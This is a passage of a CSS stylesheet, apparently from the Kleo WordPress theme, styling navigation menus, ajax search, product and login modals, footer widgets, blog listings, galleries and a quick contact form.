.navbar-nav > li > .dropdown-menu li > a:focus, .navbar-transparent .dropdown-submenu:hover > a, .navbar-transparent .dropdown-submenu:focus > a, .navbar-transparent .dropdown-menu > .active > a { background-color: rgba(0,0,0, 0.1) !important ; } .navbar-transparent .navbar-nav > li > .dropdown-menu, .navbar-transparent .navbar-nav > li > .dropdown-menu .dropdown-menu { box-shadow: none; background-color: rgba(0,0,0, 0.6); border-color: transparent; } .navbar-transparent .navbar-nav .dropdown-menu li a { color: #fff !important; } .navbar-transparent .navbar-toggle .icon-bar { background-color: #fff !important; } .navbar-transparent .sticky-wrapper {height:auto !important;} /* Fixed Header */ .kleo-navbar-fixed .kleo-main-header { right: 0; left: 0; border-width: 0 0 1px; } .kleo-navbar-fixed .navbar { margin-left: auto !important; margin-right: auto !important; left: 0 !important; right: 0 !important; } .kleo-navbar-fixed .social-header { position: relative; } .js .navbar-resize .navbar-nav { padding-top: inherit; } .kleo-navbar-fixed .navbar { top: 0; z-index: 30; } .kleo-navbar-fixed.navbar-transparent #header { min-height: 0; position: fixed; width: 100%; z-index: 100; background-color: transparent; } .kleo-navbar-fixed.navbar-transparent .kleo-main-header { border: none; transition: background-color 0.5s ease 0s; } .kleo-navbar-fixed.navbar-transparent .page-boxed #header { max-width: 1440px; } /* Ajax Search Form */ #nav-menu-item-search { position: relative; } #ajax_search_container { padding: 0 0 5px; border-radius: 3px 3px 3px 3px; border-style: solid; border-width: 1px; z-index: 9999; position: absolute; width:300px; left:-250px; box-shadow: 2px 2px 3px rgba(102, 102, 102, 0.1); top:100%; line-height: 1.2em; } #ajax_search_container:before { position: absolute; display: block; content: ""; top: -8px; right: 20px; width: 14px; height: 14px; -webkit-transform: rotate(45deg); -moz-transform: rotate(45deg); -ms-transform: rotate(45deg); -o-transform: rotate(45deg); border-style: solid; border-width: 1px; border-color: #e5e5e5; border-right: none; border-bottom: 0; } #ajax_searchform { padding: 20px 10px 0; line-height: 20px; } .kleo_ajax_results { text-align: center; padding: 10px 0 20px; } .kleo_ajax_results h4, .kleo_ajax_entry { text-align: left; } .kleo_ajax_results h4 { font-size: 11px; font-weight: bold; height: 12px; text-transform: uppercase; color: #bbb; border-bottom: 1px solid #e5e5e5; margin: 0 0 10px; } .kleo_ajax_results h4 span { background: #fff; position: relative; top: -2px; letter-spacing: 0.2em; text-transform: uppercase; padding: 0 8px; margin-left: 5px; } .searchHidden { display: none; } .kleo_ajax_entry { padding: 5px 5px 5px 10px; display: table; width: 100%; } .kleo_ajax_entry .search_excerpt { font-size: 12px; } .kleo_ajax_entry .ajax_search_image .icon { width: 44px; height: 44px; display: inline-block; -webkit-border-radius: 100%; -moz-border-radius: 100%; border-radius: 100%; background: #f7f7f7; } .kleo_ajax_entry:last-child { border: none; } .ajax_not_found { font-style: italic; color: #777; padding: 0; } .kleo_ajax_entry:hover {} .ajax_search_content { display: table-cell; vertical-align: middle; text-align: left; padding-left: 10px; } .ajax_search_content .search_title { display: inline-block; float: left; width: 100%; line-height: 18px; } .ajax_search_content .search_excerpt { display: inline-block; float: left; line-height: 16px; } .ajax_search_image { width: 44px !important; height: 44px; line-height: 44px; text-align: center; display: table-cell; } .ajax_search_image img { width: 100%; } .ajax_search_image img.attachment-thumbnail { border-radius: 100%; width: 44px; } .ajax_search_image img.attachment-thumbnail.wp-post-image { height: 100%; } .ajax_view_all { margin: 5px 0 10px; padding: 6px 20px; display: inline-block; font-size: 11px; text-transform: uppercase; border: 1px solid #e5e5e5; border-radius: 4px; } a.ajax_view_all:after { font-family: "fontello"; font-size: 11px; content: "\e8ab"; margin-left: 10px; } .kleo-ajax-search-loading { display: none; position: absolute; right: 20px; top: 27px; width: auto; } .kleo-loading-icon:before { content: "\e9a4"; font-family: 'fontello'; display: inline-block; animation: 2s linear 0s normal none infinite spin; } .kleo-visible {display: inline-block !important;} .kleo-ajax-part:nth-child(odd) {} .kleo-ajax-part:nth-child(even) {} .kleo-ajax-type-members {} .kleo-ajax-type-groups {} .kleo-ajax-type-page {} .kleo-ajax-type-post {} .kleo-ajax-type-portfolio {} .kleo-ajax-type-product {} .show_search_pop { -webkit-animation: show_search_pop 0.3s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); -moz-animation: show_search_pop 0.3s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); -o-animation: show_search_pop 0.3s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); animation: show_search_pop 0.3s 1 cubic-bezier(0.175, 0.885, 0.320, 1.275); } @-webkit-keyframes show_search_pop { 0% { -webkit-transform:scale(0.8); } 100% { -webkit-transform:scale(1); } } @-moz-keyframes show_search_pop { 0% { -moz-transform:scale(0.8); } 100% { -moz-transform:scale(1); } } @-o-keyframes show_search_pop { 0% { -o-transform:scale(0.8);} 100% { -o-transform:scale(1); } } @keyframes show_search_pop { 0% { transform:scale(0.8); } 100% { transform:scale(1); } } /* Modals */ /* Page flicker fix when open-close modals */ .modal { overflow-y: hidden; position: absolute; } body.modal-open{ margin-right: 0px !important; } /* End fix */ /* Temporary */ .modal { min-height: 600px; top: calc(50% - 300px) !important; } /* End Temporary */ .modal-lg { margin-top: 60px; width: 800px; } .product-modal .kleo-carousel-items { visibility: hidden; } .product-modal .kleo-product-image img { width: 100%; } .no-js .product-modal .kleo-carousel-items { visibility: visible; } .product-modal .caroufredsel_wrapper { margin: 0 !important; } #productModal .product-info { padding: 20px; } #productModal .entry-title { font-size: 24px; } #productModal .price { font-size: 18px; color: #000; } #productModal form.cart { padding: 1.25em 0; } #productModal .quantity { margin: 0 10px 0 0; width: auto; float: left; } #productModal .quantity input.qty { border: 1px solid #e5e5e5; border-radius: 3px; box-shadow: 0 0 2px 0 #F7F6F7 inset; float: left; font-weight: 700; height: 40px; padding: 0; text-align: center; width: 40px; } #productModal table.variations { width: 100%; margin-bottom: 1.25em; } /*#productModal table tr { border-bottom: 1px solid #eee; }*/ #productModal table tr td { vertical-align: middle; padding: .25em 0; } #productModal table tr td.label label { margin-top: 11px; } /*#productModal table tr:last-child { border-bottom: none; }*/ #productModal .reset_variations { display: none !important; } #productModal .single_add_to_cart_button { color: #000; } #productModal .product_meta { font-size: 0.846em; text-transform: uppercase; color: #bbb; } #productModal .posted_in, #productModal .tagged_as { display: block; border-top: 1px solid #f7f7f7; padding: 5px 0; } #productModal .hr-title { display: none; } #productModal .share-links { text-align: left; margin-left: -6px; } #productModal { background: none repeat scroll 0 0 #FFFFFF; margin: 0 auto; max-width: 800px; position: relative; width: 90%; } #productModal input.button, #productModal a.button, #productModal button.button { font-size: 11px; margin: 0; line-height: 1.5em; cursor: pointer; position: relative; font-family: inherit; overflow: visible; padding: 10px; text-decoration: none; text-transform: uppercase; -webkit-border-radius: 2px; border-radius: 2px; left: auto; color: #5e5e5e; border: 1px solid #e5e5e5; white-space: nowrap; display: inline-block; transition: all 0.4s ease-in-out 0s; } #productModal input.button:hover, #productModal a.button:hover, #productModal button.button:hover { background: #fff; } .mfp-bg { opacity: 0; transition: opacity 200ms ease-out 0s; } .mfp-wrap .mfp-container { padding: 10px; } .kleo-mfp-zoom .mfp-content { opacity: 0; transform: scale(0.5); transform-origin: center top 0; transition: all 0.3s ease-in-out 0s; } .kleo-mfp-zoom.mfp-ready .mfp-content { opacity: 1; transform: scale(1); } .kleo-mfp-zoom.mfp-removing .mfp-content { opacity: 0; transform: scale(0.8); } .kleo-mfp-zoom.mfp-bg .mfp-content { opacity: 0; transition: opacity 0.3s ease-out 0s; } .kleo-mfp-zoom.mfp-ready.mfp-bg .mfp-content { opacity: 0.8; } .kleo-mfp-zoom.mfp-removing.mfp-bg .mfp-content { opacity: 0; } /* Common for Magnific Zoom */ .mfp-container .mfp-content { width: auto; } .mfp-container .mfp-figure:after { background: none; box-shadow: none; } /* Login modal */ .kleo-form-modal { background: none repeat scroll 0 0 #ffffff; margin: 0 auto; max-width: 400px; position: relative; width: 90%; } .kleo-form-signin { padding: 0 20px 10px 20px; } .kleo-pop-title-wrap { /*margin-bottom: 20px;*/ padding: 20px 0; } .kleo-pop-title { margin: 0; } .kleo-form-modal .kleo-facebook-connect { border-radius: 4px; font-size: 16px; line-height: 1.33; padding: 14px 20px; } #kleo-login-result, #kleo-lost-result { clear: both; margin: 10px 0; } .kleo-other-action { margin-top: 10px; } .wrong-response { color: red; } .good-response { color: green; } .kleo-form-modal .kleo-fb-wrapper { background: #3B5997; padding: 50px 0; } .kleo-form-modal .mfp-close { color: #3498DB !important; } .kleo-form-modal .kleo-facebook-connect.btn.btn-default { background-color: transparent; color: #fff; border-color: rgba(255,255,255, 0.3); border-width: 2px; } .kleo-form-modal .kleo-facebook-connect.btn.btn-default:hover { box-shadow: 0 1px 1px 0 rgba(0, 0, 0, 0.18); } .kleo-form-signin #forgot-email { margin-top: 30px; } /* Temporary */ .kleo-form-modal .hr-title { display: none; } /*Menu dropdown toggle*/ .kleo-toggle-menu { position: relative; } .kleo-main-header .navbar-collapse ul.kleo-toggle-submenu * { line-height: normal; } .kleo-toggle-menu .caret { display: none; } .kleo-toggle-menu .kleo-toggle-submenu { position: absolute; padding: 0; display: none; /*display: block !important;*/ list-style: none; width: 300px; left: auto; right: -10px; z-index: 2; border-style: solid; border-width: 1px; box-shadow: 2px 2px 3px rgba(102, 102, 102, 0.1); border-radius: 0 0 3px 3px; transition: all 0.3s ease-in-out 0s; } .navbar-transparent.on-dark-bg .kleo-toggle-menu .kleo-toggle-submenu { /*background: rgba(255,255,255, 0.3);*/ } .navbar-transparent.on-dark-bg .header-scrolled .kleo-toggle-menu .kleo-toggle-submenu { /*background: inherit;*/ } .navbar-transparent .kleo-toggle-menu .kleo-toggle-submenu { border-color: transparent !important; } .kleo-toggle-menu .kleo-toggle-submenu:before { position: absolute; display: block; content: ""; top: -8px; right: 20px; width: 14px; height: 14px; -webkit-transform: rotate(45deg); -moz-transform: rotate(45deg); -ms-transform: rotate(45deg); -o-transform: rotate(45deg); border-style: solid; border-width: 1px; border-color: #e5e5e5; border-right: none; border-bottom: 0; z-index: 999; } .navbar-transparent.on-dark-bg .kleo-toggle-menu .kleo-toggle-submenu:before {} .kleo-toggle-menu a.remove { position: absolute; right: 15px; top: 13px; border-style: solid; border-width: 1px; border-radius: 2px; padding: 0 5px; display: inline-block; } .kleo-toggle-menu a.remove:hover {} .kleo-toggle-submenu .submenu-inner { font-size: 12px; padding-left: 0; word-wrap: break-word; max-height: 450px; overflow-y: auto; line-height: normal; } .kleo-toggle-submenu .kleo-submenu-item { border-bottom-style: solid; border-bottom-width: 1px; clear: both; overflow: hidden; padding: 10px; position: relative; transition: all 0.5s ease 0s; width: 100%; } .kleo-toggle-submenu .kleo-submenu-item:last-child { border-bottom: none; } .kleo-toggle-submenu .kleo-submenu-item a.remove { top: 10px; } .kleo-toggle-menu.kleo-loading a span.kleo-notifications { display: none; } .kleo-toggle-menu .minicart-buttons { padding: 15px; } .kleo-toggle-menu.kleo-loading > a:after { content: "\e997"; font-family: "fontello"; animation: 2s linear 0s normal none infinite spin; display: inline-block; position: absolute; top: -7px; right: 0; } .kleo-notifications-nav ul { counter-reset:section; } .kleo-notifications-nav ul.submenu-inner.has-notif li:before { counter-increment:section; content:counter(section); font-size:24px; margin-right:10px; position: absolute; left: 5px; top: 0; } .kleo-notifications-nav ul.submenu-inner li { padding-left: 26px; } .notify-contents { /*position: relative; line-height: normal !important;*/ position: relative; } .kleo-notifications-nav li > .sa-notification, .kleo-notifications-nav li > .notification{ margin-top: 0 !important; padding-bottom: 0 !important; height: auto !important; padding-left: 0 !important; width: 100%; } .kleo-notifications-nav .social-delete { display: none; } .no-alert { display: none !important; } .kleo-notifications { border-radius: 100%; display: inline; font-size: 10px; font-weight: bold; line-height: 19px; position: absolute; right: -11px; text-shadow: none; top: -11px; width: 20px; height: 20px; text-align: center; } /* Footer Section & Widgets */ #footer { font-weight: 300; } #footer ul { padding-left: 0; margin-bottom: 0; } #footer li { list-style: none; } #footer .list-unstyled li { padding-bottom: 5px; } #footer a i { color: #777; } #footer a:hover i { color: #999; } #footer .btn-app { color: #777; margin-right: 5px; margin-bottom: 5px; } #footer .widget-title { margin-bottom: 14px; background-image: none; } #footer .btn-app.btn-primary { background: #252525; } #footer .ordered-list.colored-icons li:before { color: #fff; } #footer .input-group { margin-bottom: 10px; } #footer .input-group input[type="text"] { background: #252525; border: 1px solid #333; color: #777; } #footer .input-group-btn .btn-default { background: #777; border: 1px solid #777; color: #fafafa; } #footer .form-control {} #footer .form-control:focus { border-color: #777 !important; outline: 0; -webkit-box-shadow: none; box-shadow: none; } /* Footer widgets */ #footer .widget { margin-bottom: 30px; } .kleo-block:before, .kleo-block:after { display: table; content: " "; } .kleo-block:after { clear: both; } .news-widget-wrap {} .news-content.post-format-standard {} .news-content { padding-bottom: 10px; padding-top: 9px; float: none; clear: both; } .news-content:first-child { padding-top: 0; } .news-content.list-divider:first-child { border: none; padding-top: 10px; } #footer .news-link:hover .news-thumb { } .news-thumb { clear: both; display: inline-block; float: left; margin-bottom: 5px; margin-right: 10px; } .news-thumb:empty { display: none; } .news-thumb img { width: 40px; height: 40px; border-radius: 100%; } .news-headline { display: block; } .news-time { display: block; } .tagcloud { display: inline-block; } /* Socket Section */ #socket { position: relative; } #socket .template-page { padding: 0; } /* ----------------------------------------- 05. WordPress Styles ----------------------------------------- */ /* For All Posts */ .masonry-listing .post-title { margin-left: -13px; margin-bottom: 10px; padding-left: 10px; } section.alternate-color .masonry-listing .post-title { margin-left: -10px; } .masonry-listing .post-footer { border-top-style: solid; border-top-width: 1px; } .masonry-listing .post-content { border-style: solid; border-width: 1px; border-left-width: 3px; } section.alternate-color .masonry-listing .post-content { border-width: 0; } .masonry-listing .post-content:hover { box-shadow: 0 0 6px rgba(0, 0, 0, 0.1); } .masonry-listing .format-video .fluid-width-video-wrapper, .masonry-listing .format-image .post-image, .masonry-listing .format-standard, .masonry-listing .format-gallery .kleo-banner-slider, .masonry-listing .format-status .inner-content, .masonry-listing .format-quote .inner-content, .masonry-listing .format-link .inner-content, .masonry-listing .format-audio .post-audio {} .masonry-listing .format-link .inner-content { margin-left: -3px; padding-left: 10px; } /* Post Video */ .masonry-listing .format-video .fluid-width-video-wrapper { margin-right: -3px; width: 100%; } .masonry-listing .format-video .post-title { border-left: 3px solid #07baf4; } /* Post Standard */ .masonry-listing .format-standard .post-title { border-left: 3px solid #8a52ad; } /* Post Image */ .masonry-listing .format-image .post-image {} .masonry-listing .format-image .post-title { border-left: 3px solid #fc604a; } /* Post Gallery */ .masonry-listing .format-gallery .kleo-banner-slider {} .masonry-listing .format-gallery .post-title { border-left: 3px solid #43ae9e; } /* Post Audio */ .masonry-listing .format-audio .post-audio {} .masonry-listing .format-audio .post-title { border-left: 3px solid #367bb7; } /* Post Status */ .masonry-listing .format-status .inner-content { margin-top: 10px; border-left: 3px solid #ed005a; } /* Post Status */ .masonry-listing .format-link .inner-content { margin-top: 10px; border-left: 3px solid #00c5c4; } /* Post Quote */ .masonry-listing .format-quote, .masonry-listing .format-quote .post-footer a, .masonry-listing .format-quote .post-footer a .muted { color: #fff; } .masonry-listing .format-quote .post-content { padding-top: 20px; border: none; } .masonry-listing .format-quote .post-footer { border: none; } .masonry-listing .format-quote .inner-content { font-size: 14px; line-height: 24px; letter-spacing: .1em; font-style: italic; margin-left: 40px; } .masonry-listing .format-quote .inner-content:before { font: 160% "fontello"; content: "\e854"; color: #fff; margin-left: -30px; float: left; } /* Post Aside */ .masonry-listing .format-aside .post-title { border-left: 3px solid #ee2534; } /* Featured Post */ .masonry-listing .featured-content .post-header { background: #f7f7f7; } .masonry-listing .featured-content .post-header:before { border-color: #f7f7f7; } .featured-content .kleo-carousel .post-title { margin-left: 0px; } /* Single Post */ .single .wrap-content > article.post {} .unapproved { color: red; } article .article-meta { width: 100px; float: left; text-align: right; } article .article-meta .post-meta .avatar { display: block; overflow: hidden; border-radius: 100%; } article .article-meta .entry-date { font-size: 18px; font-weight: 100; display: inline-block; width: 100%; line-height: 28px; } article .article-meta .post-meta { font-size: 0; } article .article-meta .post-meta small { font-size: 11px; } /*article .article-meta .post-meta a.post-time:after { content: attr(title); display: block; }*/ article .article-meta .post-meta .meta-category {} article .article-meta .post-meta .meta-comment-count, article .article-meta .post-meta .meta-links{ display: block; clear: both; } article .article-meta .post-meta .meta-links i { padding-left: 5px; } article .post-header .post-meta .meta-links i { padding-right: 3px; } article .post-header .post-meta .meta-author img { overflow: hidden; border-radius: 100%; height: 25px; width: 25px; } article .article-meta .post-meta .meta-author a:after, article .article-meta .post-meta .meta-links a:after, article .article-meta .post-meta .meta-category a:after, article .article-meta .post-meta .meta-comment-count a:after { content: inherit; } article .article-meta .post-meta .meta-author { float: right; } article .article-meta .post-meta .meta-author img { float: right; } article .article-meta .post-meta .meta-author .author-name { display: block; clear: both; } article .article-meta .edit-link { text-transform: uppercase; font-size: 11px; } article .article-meta .edit-link:after { content: " \2192"; } .single .with-meta .article-media, .posts-listing.standard-listing.with-meta .article-media { margin-left: 130px; margin-bottom: 40px; } .single .container .with-meta .article-content, .posts-listing.standard-listing.with-meta .article-content { margin-left: 130px; padding: 0 0 40px; } img.attachment-kleo-full-width { width: 100%; } .article-content > p:empty, .wrap-content > p:empty, #main > p:empty { display: none; } /* Attachment */ .single-attachment {} .single-attachment .entry-header { width: 100px; float: left; text-align: right; } .single-attachment .post-time { font-size: 18px; /*font-family: 'Roboto Condensed', sans-serif;*/ font-weight: 100; display: inline-block; width: 100%; line-height: 28px; } .single-attachment .link-list, .single-attachment .link-list a {} .single-attachment .entry-content { margin-left: 130px; margin-bottom: 40px; } #image-navigation { padding-left: 130px; text-align: center; } #image-navigation .previous-image, #image-navigation .next-image { display: inline-block; padding: 0 10px; } #image-navigation .previous-image:before { content: "\2190"; margin-right: 5px; } #image-navigation .next-image:after { content: "\2192"; margin-left: 5px; } /* Listing/Category Posts */ .posts-listing.standard-listing .type-post { display: inline-block; width: 100%; margin-bottom: 30px; } .posts-listing.standard-listing.with-meta .type-post { margin-bottom: 80px; } .posts-listing.standard-listing.with-meta .article-title { margin-left: 130px; } .tpl-3ll article .article-meta, .tpl-3lr article .article-meta, .tpl-3rr article .article-meta/*, .single-attachment .entry-header*/ { width: 100%; float: none; text-align: left; margin-bottom: 10px; } .tpl-3ll.posts-listing.standard-listing.with-meta .article-title, .single .tpl-3ll.with-meta .article-media, .tpl-3ll.posts-listing.standard-listing.with-meta .article-media, .single .container .tpl-3ll.with-meta .article-content, .tpl-3ll.posts-listing.standard-listing.with-meta .article-content, .tpl-3lr.posts-listing.standard-listing.with-meta .article-title, .single .tpl-3lr.with-meta .article-media, .tpl-3lr.posts-listing.standard-listing.with-meta .article-media, .single .container .tpl-3lr.with-meta .article-content, .tpl-3lr.posts-listing.standard-listing.with-meta .article-content, .tpl-3rr.posts-listing.standard-listing.with-meta .article-title, .single .tpl-3rr.with-meta .article-media, .tpl-3rr.posts-listing.standard-listing.with-meta .article-media, .single .container .tpl-3rr.with-meta .article-content, .tpl-3rr.posts-listing.standard-listing.with-meta .article-content/*, .single-attachment .entry-content*/ { margin-left: 0; } /*#image-navigation { padding-left: 0; }*/ .tpl-3ll article .article-meta .entry-date, .tpl-3ll article .article-meta .post-meta, .tpl-3lr article .article-meta .entry-date, .tpl-3lr article .article-meta .post-meta, .tpl-3rr article .article-meta .entry-date, .tpl-3rr article .article-meta .post-meta/*, .single-attachment .post-time*/ { width: auto; font-family: inherit; font-size: inherit; } .tpl-3ll article .article-meta .post-meta .meta-links, .tpl-3ll article .article-meta .post-meta a.post-time:after, .tpl-3ll article .article-meta .post-meta .meta-comment-count, .tpl-3lr article .article-meta .post-meta .meta-links, .tpl-3lr article .article-meta .post-meta a.post-time:after, .tpl-3lr article .article-meta .post-meta .meta-comment-count, .tpl-3rr article .article-meta .post-meta .meta-links, .tpl-3rr article .article-meta .post-meta a.post-time:after, .tpl-3rr article .article-meta .post-meta .meta-comment-count { display: inline; } .no-meta .article-meta, .no-meta .post-meta { display: none; } .no-excerpt .post-info, .no-excerpt .article-content { display: none; } /* Blog list style */ .small-listing .post-header, .small-listing .post-info, .small-listing .post-footer{ padding: 0; } .small-listing .post-title { margin-top: 0; } .small-listing .post-item { padding: 20px 0; } .small-listing .featured-content .post-item { padding: 20px 10px; } .small-listing .post-format-icon { border-radius: 50%; background: #f7f7f7; width: 60px; height: 60px; line-height: 60px; text-align: center; margin: 0 auto 10px; } .small-listing .entry-summary > p:first-child { margin-top: 0; } /* Blog layout switch */ .kleo-view-switch { float: right; margin-bottom: 20px; } .kleo-view-switch ul { list-style: none; padding: 0; } .kleo-view-switch li { float: left; padding: 0 5px; } .kleo-view-switch li:last-child { padding-right: 0; } .kleo-view-switch span { border: 1px solid #ccc; color: #ccc; cursor: pointer; font-family: fontello; font-size: 1.2em; padding: 5px; } .kleo-view-switch span.active { color: #333; } .kleo-view-switch .switch-masonry:before { content: "\E81F"; } .kleo-view-switch .switch-small:before { content: "\E820"; } .kleo-view-switch .switch-standard:before { content: "\E87A"; } /* Social share */ .share-links { text-align: center; padding: 30px 0; clear: both; } .share-links div.hr-title { margin-bottom: 30px; } .share-links span a { font-size: 18px; display: inline-block; margin: 0 6px; } .social-share-wrap { position: relative; } /* Articles likes */ .item-likes:before { content: "\e810"; font-family: "fontello"; margin-right: 5px; } .item-likes.liked:before, .item-likes:hover:before { content: "\e80f"; font-family: "fontello"; } .kleo-love .item-likes-count, .kleo-love .item-likes-postfix { font-weight: 100; font-size: 16px; } /* Related Articles */ .related-wrap { padding: 30px 0; clear: both; } .related-wrap .kleo-carousel-container {} /* 404 page */ .search-404 .input-group input[type="text"] { border: none; -webkit-transition: .7s; -moz-transition: .7s; -o-transition: .7s; transition: .7s; color: #bbb; font-weight: normal; background: transparent; box-shadow: none; min-width: 320px; } .search-404 .input-group input[type="text"]:focus { min-width: 430px; color: #777; } .search-404 .input-group-btn #searchsubmit { border: none; text-indent: -9999em; background: url(../../assets/img/sprite.png) no-repeat; width: 24px; height: 24px; border-radius: 100%; position: relative; float: right; margin-top: 3px; } .search-404 #searchform { margin: 30px auto; display: inline-block; border-radius: 22px; border: 1px solid #e5e5e5; height: 33px; line-height: 30px; padding: 0 10px; min-width: 320px; text-align: left; box-shadow: 0 0 0 4px #f7f7f7; } /* Img alignment */ body .alignleft, .entry-content a:hover .alignleft { float: left; margin: 4px 10px 0px 0; display: block; } body .alignright, .entry-content a:hover .alignright { float: right; margin: 4px 0px 0px 10px; display: block; } body .aligncenter, .entry-content a:hover .aligncenter { clear: both; display: block; margin: 10px auto; padding: 10px 0; } body .article-content .aligncenter, .article-content a:hover .aligncenter { clear: none; } .alignleft img, .alignright img { display: block; } /* Gallery */ .gallery { margin-bottom: 20px; } .gallery-item { float: left; margin: 0 1px 1px 0 !important; overflow: hidden; position: relative; } .gallery-item img.attachment-thumbnail { border: none !important; width: 100%; } .gallery-columns-1 .gallery-item { max-width: 100%; } .gallery-columns-2 .gallery-item { max-width: 48%; max-width: -webkit-calc(50% - 4px); max-width: calc(50% - 4px); } .gallery-columns-3 .gallery-item { max-width: 32%; max-width: -webkit-calc(33.3% - 4px); max-width: calc(33.3% - 4px); } .gallery-columns-4 .gallery-item { max-width: 23%; max-width: -webkit-calc(25% - 4px); max-width: calc(25% - 4px); } .gallery-columns-5 .gallery-item { max-width: 19%; max-width: -webkit-calc(20% - 4px); max-width: calc(20% - 4px); } .gallery-columns-6 .gallery-item { max-width: 15%; max-width: -webkit-calc(16.7% - 4px); max-width: calc(16.7% - 4px); } .gallery-columns-7 .gallery-item { max-width: 13%; max-width: -webkit-calc(14.28% - 4px); max-width: calc(14.28% - 4px); } .gallery-columns-8 .gallery-item { max-width: 11%; max-width: -webkit-calc(12.5% - 4px); max-width: calc(12.5% - 4px); } .gallery-columns-9 .gallery-item { max-width: 9%; max-width: -webkit-calc(11.1% - 4px); max-width: calc(11.1% - 4px); } .gallery-columns-1 .gallery-item:nth-of-type(1n), .gallery-columns-2 .gallery-item:nth-of-type(2n), .gallery-columns-3 .gallery-item:nth-of-type(3n), .gallery-columns-4 .gallery-item:nth-of-type(4n), .gallery-columns-5 .gallery-item:nth-of-type(5n), .gallery-columns-6 .gallery-item:nth-of-type(6n), .gallery-columns-7 .gallery-item:nth-of-type(7n), .gallery-columns-8 .gallery-item:nth-of-type(8n), .gallery-columns-9 .gallery-item:nth-of-type(9n) { margin-right: 0; } .gallery-caption { background-color: rgba(0, 0, 0, 0.7); -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; color: #fff; font-size: 12px; line-height: 1.5; margin: 0; max-height: 50%; opacity: 0; padding: 6px 8px; position: absolute; bottom: 0; left: 0; text-align: left; width: 100%; } .gallery-caption:before { content: ""; height: 100%; min-height: 49px; position: absolute; top: 0; left: 0; width: 100%; } .gallery-item:hover .gallery-caption { opacity: 1; } .gallery-columns-7 .gallery-caption, .gallery-columns-8 .gallery-caption, .gallery-columns-9 .gallery-caption { display: none; } .bypostauthor {} .gallery-icon { margin: 0; } .gallery-item { margin: 0; } /*** Image caption ***/ div .wp-caption { max-width: 100%; font-size: 11px; font-style: italic; border-width:1px; border-style: solid; margin:5px 15px 10px 0; position: relative; } .wp-caption img { border: medium none; display:block; padding:5px; margin:0; width:100%; } .wp-caption-text { display: block; font-size:11px; font-style:italic; margin:0 auto; padding:3px 10px 5px; text-align:center; font-family: sans-serif; } .wp-caption.aligncenter { margin: 5px auto 10px auto; } /* Smiley */ .wp-smiley { display: inline-block; border: none; } /* Quick Contact Form */ .kleo-quick-contact-wrapper { position: fixed; right: 20px; bottom: 50px; z-index: 300; transition: all .2s ease-in-out; -webkit-transition: all .2s ease-in-out; -moz-transition: all .2s ease-in-out; -ms-transition: all .2s ease-in-out; -o-transition: all .2s ease-in-out; } .kleo-quick-contact-wrapper.off { right: 20px; } .kleo-quick-contact-wrapper.on { right: 90px; } .kleo-quick-contact-wrapper .kleo-contact-form { position: relative; } .kleo-quick-contact-wrapper .kleo-contact-form .form-control, .kleo-quick-contact-wrapper .kleo-contact-form textarea { min-width: 240px; margin-bottom: 6px; } .kleo-quick-contact-wrapper .kleo-contact-form .text-input:focus, .kleo-quick-contact-wrapper .kleo-contact-form .textarea:focus { color: #666; } .kleo-contact-form textarea { height: 100px; } .kleo-contact-form .kleo-contact-loading { float: left; } .kleo-contact-form .kleo-contact-loading { display: none; } .mail-success { color: green; } .mail-error { color: red; } #kleo-quick-contact { position: absolute; bottom: 70px; right: 0; -webkit-box-shadow: 0 0 50px 10px rgba(0,0,0,0.15); -moz-box-shadow: 0 0 50px 10px rgba(0,0,0,0.15); box-shadow: 0px 3px 13px 0px rgba(0, 0, 0, 0.1); -webkit-border-radius: 4px; -moz-border-radius: 4px; border-style: solid; border-width: 1px; border-color: #e5e5e5; border-radius: 4px; padding: 20px; z-index: 100; display: none; background-color: #f7f7f7; } #kleo-quick-contact .bottom-arrow { position: absolute; display: block; content: ""; bottom: -8px; right: 20px; width: 14px; height: 14px; -webkit-transform: rotate(45deg); -moz-transform: rotate(45deg); -ms-transform: rotate(45deg); -o-transform: rotate(45deg); border-style: solid; border-width: 1px; border-color: #e5e5e5; border-left: none; border-top: 0; background-color: #f7f7f7; } .kleo-quick-contact-link { display: block; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; background-color: #ccc; background-color: rgba(0,0,0,0.2); padding: 12px 14px; transition: all .2s ease-in-out; -webkit-transition: all .2s ease-in-out; -moz-transition: all .2s ease-in-out; -ms-transition: all .2s ease-in-out; -o-transition: all .2s ease-in-out; } .kleo-quick-contact-link i { color: #fff; font-size: 24px; line-height: 24px; } /* Go To Top */ .kleo-go-top { -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; background-color: #ccc; background-color: rgba(0,0,0,0.2); padding: 12px 14px; position: fixed; bottom: 50px; right: -60px; z-index: 100; opacity: 0; transition: all .2s ease-in-out; -webkit-transition: all .2s ease-in-out; -moz-transition: all .2s ease-in-out; -ms-transition: all .2s ease-in-out; -o-transition: all .2s ease-in-out; } .kleo-go-top.off { right: -60px; opacity: 0; } .kleo-go-top.on { right: 20px; opacity: 1; } .kleo-go-top:hover { background-color: rgba(0,0,0,0.4); } .kleo-go-top i { color: #fff; font-size: 24px; line-height: 24px; } /* Apply Hover Effect */ .element-wrap { display: inline-block; position: relative; width: 100%; vertical-align: middle; z-index: 0; margin: 0 auto; } .element-wrap.element-left { display: inline-block; } .element-wrap.element-left .img-element, .element-wrap.element-left .btn { display: block; float: left; } .element-wrap.element-right { display: block; float: right; } .element-wrap.element-right .img-element, .element-wrap.element-right .btn { display: block; float: right; } .element-wrap.element-center { display: block; text-align: center; margin: 0 auto; } .element-wrap.element-center .img-element { display: block; margin-left: auto; margin-right: auto; } .kleo_image, .kleo_image img { border-radius: 3px; display:block; position: relative; } .kleo_image.kleo-align-center { display: block; margin: 0 auto 10px auto; text-align: center; } .kleo_image.kleo-align-center img { margin: 0 auto; display: inline-block; } .kleo_image.kleo-align-left { display: block; float:left; margin-right: 15px; margin-top: 5px; } .kleo_image.kleo-align-right { display: block; float: right; margin-left: 15px; margin-top: 5px; } .slotholder:after { content: ' '; width: 100%; height: 100%; position: absolute; top: 0; left: 0; -webkit-transition: background-color .2s linear; -moz-transition: background-color .2s linear; -o-transition: background-color .2s linear; -ms-transition: background-color .2s linear; transition: background-color .2s linear; } .hover-element, .higlight-caption { position: absolute; top: 0; left: 0; width: 100%; height: 100%; -webkit-transition: background-color .2s linear; -moz-transition: background-color .2s linear; -o-transition: background-color .2s linear; -ms-transition: background-color .2s linear; transition: background-color .2s linear; } .hover-element:hover { background: rgba(0,0,0,0.3); } .hover-element > i { font-style: normal; width: 